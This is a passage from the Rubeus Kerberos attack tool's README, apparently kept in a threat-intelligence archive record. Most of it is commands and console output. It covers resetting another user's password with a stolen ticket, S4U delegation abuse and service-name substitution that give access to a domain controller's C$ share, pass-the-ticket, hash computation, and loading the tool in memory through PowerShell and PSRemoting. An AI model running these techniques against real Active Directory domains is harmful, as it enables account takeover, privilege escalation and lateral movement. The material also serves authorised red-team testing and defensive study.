prompt:\r\nC:\\Rubeus\u003eRubeus.exe createnetonly /program:\"C:\\Windows\\System32\\cmd.exe\" /show\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Create Process (/netonly)\r\n[*] Showing process : True\r\n[+] Process : 'C:\\Windows\\System32\\cmd.exe' successfully created with LOGON_TYPE = 9\r\n[+] ProcessID : 5352\r\n[+] LUID : 0x4a091c0\r\nCreate a visible command prompt and import a ticket:\r\nC:\\Rubeus\u003eRubeus.exe createnetonly /program:\"C:\\Windows\\System32\\cmd.exe\" /show /ticket:ticket.kirbi\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Create Process (/netonly)\r\n[*] Showing process : True\r\n[+] Process : 'C:\\Windows\\System32\\cmd.exe' successfully created with LOGON_TYPE = 9\r\n[+] ProcessID : 5352\r\n[+] LUID : 0x4a091c0\r\n[+] Ticket successfully imported!\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 88 of 100\n\nchangepw\r\nThe changepw action will take a user's TGT .kirbi blog and execute a MS kpasswd password change with the\r\nspecified /new:PASSWORD value. If a /dc is not specified, the computer's current domain controller is extracted\r\nand used as the destination for the password reset traffic. This is the Aorato Kerberos password reset disclosed in\r\n2014, and is equivalent to Kekeo's misc::changepw function.\r\nThe /targetuser argument can be used to change the password of other users, given the user whose TGT it is\r\nhas enough privileges. The format required is domain.com\\user.\r\nNote that either a users TGT or a service ticket for kadmin/changepw can be used to change the password\r\nYou can retrieve a TGT blob using the asktgt command.\r\nC:\\Rubeus\u003eRubeus.exe changepw /ticket:doIFFjCCBRKgA...(snip)...== /new:Password123!\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Reset User Password (AoratoPw)\r\n[*] Changing password for user: harmj0y@TESTLAB.LOCAL\r\n[*] New password value: Password123!\r\n[*] Building AP-REQ for the MS Kpassword request\r\n[*] Building Authenticator with encryption key type: rc4_hmac\r\n[*] base64(session subkey): nX2FOQ3RsGxoI8uqIg1zlg==\r\n[*] Building the KRV-PRIV structure\r\n[*] Connecting to 192.168.52.100:464\r\n[*] Sent 1347 bytes\r\n[*] Received 167 bytes\r\n[+] Password change success!\r\nChanging the password of another user (dev.ccob@dev.rubeus.ghostpack.local) with a service ticket for\r\nkadmin/changepw retrieved using a referral TGT for harmj0y@rubeus.ghostpack.local:\r\nC:\\Rubeus\u003eRubeus.exe changepw /targetuser:dev.rubeus.ghostpack.local\\dev.ccob /new:Pwn3dPassword123! /ticket:do\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 89 of 100\n\n| __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Reset User Password (AoratoPw)\r\n[*] Using domain controller: DevDC1.dev.rubeus.ghostpack.local (192.168.71.85)\r\n[*] Resetting password for target user: dev.rubeus.ghostpack.local\\dev.ccob\r\n[*] New password value: Pwn3dPassword123!\r\n[*] Building AP-REQ for the MS Kpassword request\r\n[*] Building Authenticator with encryption key type: aes256_cts_hmac_sha1\r\n[*] base64(session subkey): wCAQoKiWlCjeEjfmqo+aA7ZlLSXYWhv+LzlXkGVJSXU=\r\n[*] Building the KRV-PRIV structure\r\n[+] Password change success!\r\nhash\r\nThe hash action will take a /password:X and optional /user:USER and/or /domain:DOMAIN . It will generate\r\nthe rc4_hmac (NTLM) representation of the password using @gentilkiwi's kerberos:hash (KERB_ECRYPT\r\nHashPassword) approach. If user and domain names are specified, the aes128_cts_hmac_sha1,\r\naes256_cts_hmac_sha1, and des_cbc_md5 hash forms are generated. The user and domain names are used as salts\r\nfor the AES and DES implementations.\r\nCalculating the rc4_hmac of a password:\r\nC:\\Rubeus\u003eRubeus.exe hash /password:Password123!\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.0\r\n[*] Action: Calculate Password Hashes\r\n[*] Input password : Password123!\r\n[*] rc4_hmac : 2B576ACBE6BCFDA7294D6BD18041B8FE\r\n[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 90 of 100\n\nCalculating all hash formats:\r\nC:\\Rubeus\u003eRubeus.exe hash /password:Password123! /user:harmj0y /domain:testlab.local\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.0\r\n[*] Action: Calculate Password Hashes\r\n[*] Input password : Password123!\r\n[*] Input username : harmj0y\r\n[*] Input domain : testlab.local\r\n[*] Salt : TESTLAB.LOCALharmj0y\r\n[*] rc4_hmac : 2B576ACBE6BCFDA7294D6BD18041B8FE\r\n[*] aes128_cts_hmac_sha1 : B0A79AB550536860123B427C14F2A531\r\n[*] aes256_cts_hmac_sha1 : F7FEBF9779401B653911A56A79FF9E3A58F7F8990FDB3D9CA0E89227ABF13287\r\n[*] des_cbc_md5 : 614589E66D6B3792\r\ntgssub\r\nThe tgssub action will take a service ticket base64 blob/file specification and substitute an alternate service name\r\ninto the ticket. This is useful for S4U abuse and other scenarios.\r\nThe /altservice:X argument is required and can either be a standalone sname (ldap, cifs, etc.) or a full service\r\nprincipal name (cifs/computer.domain.com). The former will create a new sname with only the service given,\r\nuseful for cases where only the hostname is required. The latter is useful in some S4U2self abuse scenarios with\r\nresource-based constrained delegation. See Elad Shamir's post on the topic for more information.\r\nThe /srealm:Y argument is optional and can be used to change the service realm within the ticket.\r\nThe /ptt flag will \"pass-the-ticket\" and apply the resulting Kerberos credential to the current logon session. The\r\n/luid:0xA.. flag will apply the ticket to the specified logon session ID (elevation needed) instead of the current\r\nlogon session.\r\nExecuting the S4U2self/S4U2proxy proces to abuse traditional constrained delegation, and replacing the sname in\r\nthe final ticket. This is so you don't have to execute the S4U process for a second time:\r\nC:\\Rubeus\u003eRubeus.exe s4u /user:patsy /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /msdsspn:ldap/PRIMARY.testlab.local\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 91 of 100\n\n______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 2B576ACBE6BCFDA7294D6BD18041B8FE\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\patsy'\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIE+jCCBPagAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: S4U\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2self request for: 'patsy@TESTLAB.LOCAL'\r\n[*] Sending S4U2self request\r\n[+] S4U2self success!\r\n[*] Got a TGS for 'harmj0y@TESTLAB.LOCAL' to 'patsy@TESTLAB.LOCAL'\r\n[*] base64(ticket.kirbi):\r\n doIFXjCCBVqgAwIBBaEDAgEWoo...(snip)...\r\n[*] Impersonating user 'harmj0y' to target SPN 'ldap/PRIMARY.testlab.local'\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2proxy request for service: 'ldap/PRIMARY.testlab.local'\r\n[*] Sending S4U2proxy request\r\n[+] S4U2proxy success!\r\n[*] base64(ticket.kirbi) for SPN 'ldap/PRIMARY.testlab.local':\r\n doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nAccess is denied.\r\nC:\\Rubeus\u003eRubeus.exe tgssub /ticket:doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)... /altservice:cifs /ptt\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 92 of 100\n\n______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: Service Ticket sname Substitution\r\n[*] Substituting in alternate service name: cifs\r\n[*] base64(ticket.kirbi):\r\n doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: Describe Ticket\r\nUserName : harmj0y@TESTLAB.LOCAL\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : cifs/PRIMARY.testlab.local\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 3/1/2019 12:51:06 PM\r\nEndTime : 3/1/2019 5:51:06 PM\r\nRenewTill : 3/8/2019 12:51:06 PM\r\nFlags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable\r\nKeyType : aes128_cts_hmac_sha1\r\nBase64(key) : yxQVMhl0qn3P0wUUC4KnGQ==\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nVolume in drive \\\\primary.testlab.local\\C$ has no label.\r\nVolume Serial Number is A48B-4D68\r\nDirectory of \\\\primary.testlab.local\\C$\r\n07/05/2018 12:57 PM \u003cDIR\u003e dumps\r\n03/05/2017 04:36 PM \u003cDIR\u003e inetpub\r\n07/21/2018 07:41 PM 9 out.txt\r\n08/22/2013 07:52 AM \u003cDIR\u003e PerfLogs\r\n04/15/2017 05:25 PM \u003cDIR\u003e profiles\r\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 93 of 100\n\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files (x86)\r\n10/09/2018 12:04 PM \u003cDIR\u003e Temp\r\n08/23/2018 03:52 PM \u003cDIR\u003e Users\r\n10/25/2018 01:15 PM \u003cDIR\u003e Windows\r\n 1 File(s) 9 bytes\r\n 9 Dir(s) 40,463,851,520 bytes free\r\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: List Kerberos Tickets (Current User)\r\n[*] Current LUID : 0x6de14\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 3/1/2019 12:51:06 PM ; 3/1/2019 5:51:06 PM ; 3/8/2019 12:51:06 PM\r\n Server Name : cifs/PRIMARY.testlab.local @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)\r\n [1] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 3/1/2019 12:51:06 PM ; 3/1/2019 5:51:06 PM ; 3/8/2019 12:51:06 PM\r\n Server Name : ldap/PRIMARY.testlab.local @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)\r\nExecuting S4U2self to a machine using its machine account hash, substituting in the service names we want to\r\nabuse after:\r\nC:\\Rubeus\u003eRubeus.exe s4u /user:primary$ /rc4:46b910dbe4514bd144b44cb554c256db /impersonateuser:harmj0y\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 94 of 100\n\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 46b910dbe4514bd144b44cb554c256db\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\primary$'\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFIDCCBRygAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: S4U\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2self request for: 'primary$@TESTLAB.LOCAL'\r\n[*] Sending S4U2self request\r\n[+] S4U2self success!\r\n[*] Got a TGS for 'harmj0y@TESTLAB.LOCAL' to 'primary$@TESTLAB.LOCAL'\r\n[*] base64(ticket.kirbi):\r\n doIFgDCCBXygAwIBBaEDAgEWoo...(snip)...\r\nC:\\Rubeus\u003eRubeus.exe describe /ticket:doIFgDCCBXygAwIBBaEDAgEWoo...(snip)...\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: Describe Ticket\r\nUserName : harmj0y@TESTLAB.LOCAL\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : primary$\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 3/1/2019 12:43:56 PM\r\nEndTime : 3/1/2019 5:43:56 PM\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 95 of 100\n\nRenewTill : 3/8/2019 12:43:56 PM\r\nFlags : name_canonicalize, ok_as_delegate, pre_authent, renewable\r\nKeyType : aes256_cts_hmac_sha1\r\nBase64(key) : X6LnSCb4FUGo4Wec2FnfgQRz0h8zfgIRZxENxcIoIpU=\r\n[!] Service ticket uses encryption key type 'aes256_cts_hmac_sha1', unable to extract hash and salt.\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nAccess is denied.\r\nC:\\Rubeus\u003eRubeus.exe purge\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\nLuid: 0x0\r\n[*] Action: Purge Tickets\r\n[+] Tickets successfully purged!\r\nC:\\Rubeus\u003eRubeus.exe tgssub /ticket:doIFgDCCBXygAwIBBaEDAgEWoo...(snip)... /altservice:cifs/primary.testlab.loca\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: Service Ticket sname Substitution\r\n[*] Substituting in alternate service name: cifs/primary.testlab.local\r\n[*] base64(ticket.kirbi):\r\n doIFpjCCBaKgAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: Describe Ticket\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 96 of 100\n\nUserName : harmj0y@TESTLAB.LOCAL\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : cifs/primary.testlab.local\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 3/1/2019 12:43:56 PM\r\nEndTime : 3/1/2019 5:43:56 PM\r\nRenewTill : 3/8/2019 12:43:56 PM\r\nFlags : name_canonicalize, ok_as_delegate, pre_authent, renewable\r\nKeyType : aes256_cts_hmac_sha1\r\nBase64(key) : X6LnSCb4FUGo4Wec2FnfgQRz0h8zfgIRZxENxcIoIpU=\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nVolume in drive \\\\primary.testlab.local\\C$ has no label.\r\nVolume Serial Number is A48B-4D68\r\nDirectory of \\\\primary.testlab.local\\C$\r\n07/05/2018 12:57 PM \u003cDIR\u003e dumps\r\n03/05/2017 04:36 PM \u003cDIR\u003e inetpub\r\n08/22/2013 07:52 AM \u003cDIR\u003e PerfLogs\r\n04/15/2017 05:25 PM \u003cDIR\u003e profiles\r\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files\r\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files (x86)\r\n10/09/2018 12:04 PM \u003cDIR\u003e Temp\r\n08/23/2018 03:52 PM \u003cDIR\u003e Users\r\n10/25/2018 01:15 PM \u003cDIR\u003e Windows\r\n 1 File(s) 9 bytes\r\n 9 Dir(s) 40,462,831,616 bytes free\r\ncurrentluid\r\nThe currentluid action will display the current user's logon ID (LUID).\r\nC:\\Rubeus\u003eRubeus.exe currentluid\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 97 of 100\n\nv1.5.0\r\n[*] Action: Display current LUID\r\n[*] Current LogonID (LUID) : 0x121078 (1183864)\r\nlogonsession\r\nThe logonsession action will display information about the current context's logon session if not elevated, or all\r\nlogonsessions if elevated.\r\nC:\\Rubeus\u003eRubeus.exe logonsession\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.1.0\r\n[*] Action: Display current logon session information\r\n LUID : 0x28a8fd (2664701)\r\n UserName : harmj0y\r\n LogonDomain : THESHIRE\r\n SID : S-1-5-21-937929760-3187473010-80948926-1104\r\n AuthPackage : Kerberos\r\n LogonType : Interactive (2)\r\n Session : 1\r\n LogonTime : 6/9/2022 1:17:48 PM\r\n LogonServer : DC\r\n DnsDomainName : THESHIRE.LOCAL\r\n Upn : harmj0y@theshire.local\r\nIf elevated, the /current flag will display information for just the current logon session, and /luid:X will\r\ndisplay information about the target specified logon session.\r\nasrep2kirbi\r\nThe asrep2kirbi action will convert an AS-REP and a client key to a Kirbi.\r\nThe client key can be supplied as a Base64 encoded blob or as a hex string.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 98 of 100\n\nkirbi\r\nThe kirbi action is used to manipulate Kirbi's (KERB_CRED's).\r\nCurrently it only supports modifying/inserting a session key using the /sessionkey:SESSIONKEY and\r\n/sessionetype:DES|RC4|AES128|AES256 arguments, passing the Kirbi in using the /kirbi:X argument.\r\nCompile Instructions\r\nWe are not planning on releasing binaries for Rubeus, so you will have to compile yourself :)\r\nRubeus has been built against .NET 3.5 and is compatible with Visual Studio 2019 Community Edition. Simply\r\nopen up the project .sln, choose \"Release\", and build.\r\nTargeting other .NET versions\r\nRubeus' default build configuration is for .NET 3.5, which will fail on systems without that version installed. To\r\ntarget Rubeus for .NET 4 or 4.5, open the .sln solution, go to Project -\u003e Rubeus Properties and change the\r\n\"Target framework\" to another version.\r\nSidenote: Building Rubeus as a Library\r\nTo build Rubeus as a library, under Project -\u003e Rubeus Properties -\u003e change Output type to Class Library.\r\nCompile, and add the Rubeus.dll as a reference to whatever project you want. Rubeus functionality can then be\r\ninvoked as in a number of ways:\r\n// pass the Main method the arguments you want\r\nRubeus.Program.Main(\"dump /luid:3050142\".Split());\r\n// or invoke specific functionality manually\r\nRubeus.LSA.ListKerberosTicketDataAllUsers(new Rubeus.Interop.LUID());\r\nYou can then use ILMerge to merge the Rubeus.dll into your resulting project assembly for a single, self-contained file.\r\nSidenote: Running Rubeus Through PowerShell\r\nIf you want to run Rubeus in-memory through a PowerShell wrapper, first compile the Rubeus and base64-encode\r\nthe resulting assembly:\r\n[Convert]::ToBase64String([IO.File]::ReadAllBytes(\"C:\\Temp\\Rubeus.exe\")) | Out-File -Encoding ASCII C:\\Temp\\rub\r\nRubeus can then be loaded in a PowerShell script with the following (where \"aa...\" is replaced with the base64-\r\nencoded Rubeus assembly string):\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 99 of 100\n\n$RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String(\"aa...\"))\r\nThe Main() method and any arguments can then be invoked as follows:\r\n[Rubeus.Program]::Main(\"dump /user:administrator\".Split())\r\nOr individual functions can be invoked:\r\n$TicketBytes = [convert]::FromBase64String('BASE64_KERB_TICKET')\r\n# start mmc.exe as netonly, not-hidden\r\n$LogonID = [Rubeus.Helpers]::CreateProcessNetOnly(\"mmc.exe\", $true)\r\n# apply the ticket to mmc's logon session\r\n[Rubeus.LSA]::ImportTicket($TicketBytes, $LogonID)\r\nSidenote Sidenote: Running Rubeus Over PSRemoting\r\nDue to the way PSRemoting handles output, we need to redirect stdout to a string and return that instead. Luckily,\r\nRubeus has a function to help with that.\r\nIf you follow the instructions in Sidenote: Running Rubeus Through PowerShell to create a Rubeus.ps1, append\r\nsomething like the following to the script:\r\n[Rubeus.Program]::MainString(\"triage\")\r\nYou should then be able to run Rubeus over PSRemoting with something like the following:\r\n$s = New-PSSession dc.theshire.local\r\nInvoke-Command -Session $s -FilePath C:\\Temp\\Rubeus.ps1\r\nAlternatively, Rubeus' /consoleoutfile:C:\\FILE.txt argument will redirect all output streams to the specified\r\nfile.\r\nSource: https://github.com/GhostPack/Rubeus\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 100 of 100",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://github.com/GhostPack/Rubeus"
	],
	"report_names": [
		"Rubeus"
	],
	"threat_actors": [],
	"ts_created_at": 1775434914,
	"ts_updated_at": 1775791333,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/247dc916edbfc235152ec68294b5afea53f9b147.pdf",
		"text": "https://archive.orkl.eu/247dc916edbfc235152ec68294b5afea53f9b147.txt",
		"img": "https://archive.orkl.eu/247dc916edbfc235152ec68294b5afea53f9b147.jpg"
	}
}